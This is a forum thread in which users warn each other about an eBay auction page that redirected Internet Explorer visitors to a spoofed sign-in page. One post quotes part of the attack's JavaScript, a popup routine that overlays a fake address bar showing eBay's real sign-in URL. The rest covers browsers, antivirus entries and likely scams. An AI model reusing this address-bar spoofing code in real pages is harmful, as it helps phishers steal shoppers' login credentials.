Beware EBay spoof attack from within EBay item

No. Just a Mac and IE

That looks very convincing :-((

 

(The Older Gentleman) wrote in

Which is offered for sale by a user account with 168 positive feedback and
has a bid on it :-/

This is the code which spoof the url:

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-
family: \'Tahoma\', sans-serif; font-size: 8pt;">
https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&co_partnerId=2
&pUserId=&siteid=0&pageType=&pa1=&i1=&bshowgif=&UsingSSL=&ru=http%3A%2F%
2Fwww.ebay.com&pp=&pa2
=&errmsg=&runame=&ruparams=&ruproduct=&sid=&favoritenav=&migrateVisitor='

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);


Hmmmmm.

 

It was an automatic redirect (XP + IE). Didn't do anything, just went to
the auction page and ended up at a spoof login. I've let EBay know,
again - though they could disable the scripts from their auctions to
stop it happening.

 

No, java is activated. I just got the auction page - no redirect to a
login page at all. That's Macs for you, I guess.

I know for a fact that there's a java flaw in a certain well-known
web-based email system that can (and has) been exploited, but again, it
only 'works' on PCs.

I tell you, I'm sometimes very pleased to have a Mac.

I assume that the Trojan is a keylogger.

 

Ah. well, checking my preferences, I dunno about javascript. "Byte-code
verification" is set to "Check all Code"

Log Jave Output and Log Java Exceptions both checked.

That's it.

 

That's quite clever. It does a couple of things which are
obviously intended to get it round various filters.

Why ebay allow JavaScript in the first place is beyond
me - there really shouldn't be any need for it. They
really should also stop people hotlinking to their images
from other websites. This is so easy to do (one line in
a config file) that they really should know better. Ok,
so it won't stop people copying the files and hosting
them elsewhere, but it would be a damn good start!

 

Nor is FireFox and at least on my PC IE, well IE shows both addresses

http://www.blakeley.plus.com/ebay/spoof.JPG

 

My IE too - it was because of the double address line that I spotted it.
If they hadn't tried to be that clever (I think the address bar can be overwritten
in older versions of IE), I might not have noticed.

 

Ebay is rolling out drop shops - can't remember what they call them
now. There's one near us. Goods are dropped off there by sellers and
collected by buyers. I assume you have to show some form of ID and/or
proof, but it's useful to fraudtsers and scammers.

I don't think they're trying to buy items. I mean, the one on the
hijacked account was a Haynes manual for a Vespa, ffs!

Obviously grabbing someone's Ebay username and PW is handy if you're a
crim, but if there is a Trojan installation involved, I bet it's a
keylogger.

 

TOG@toil wrote

What a fucking good idea, well done Ebay.

Now all it needs is some bright spark in the comapany formerly know as
Consignia to see an opportunity.

 

No. It just relies on you inputting your username and password in the
boxes and submitting the form.

Fake auctions is the obvious one, with payment via paypal to a bank
account in a false name, which is used to buy other goods and then vanish.

 

Hmmm, PackagePal... .co.uk....

is now registered in my name

 

The trojan identified is as far as I can see the browser hijack
http://securityresponse.symantec.com/avcenter/venc/data/js.trojan.blinder.html

 

It's JS/Stealus I think

http://vil.nai.com/vil/content/v_126246.htm

 

From the descriptions it looks to me as if they're talking about the
same thing. In any event it's a bit of javascript so unless a user
actually inputs information into the fake login they're ok.

 

Even if they do it's a pretty much standard form submit routine I think,
so they wouldn't cop anything on top of giving their password away.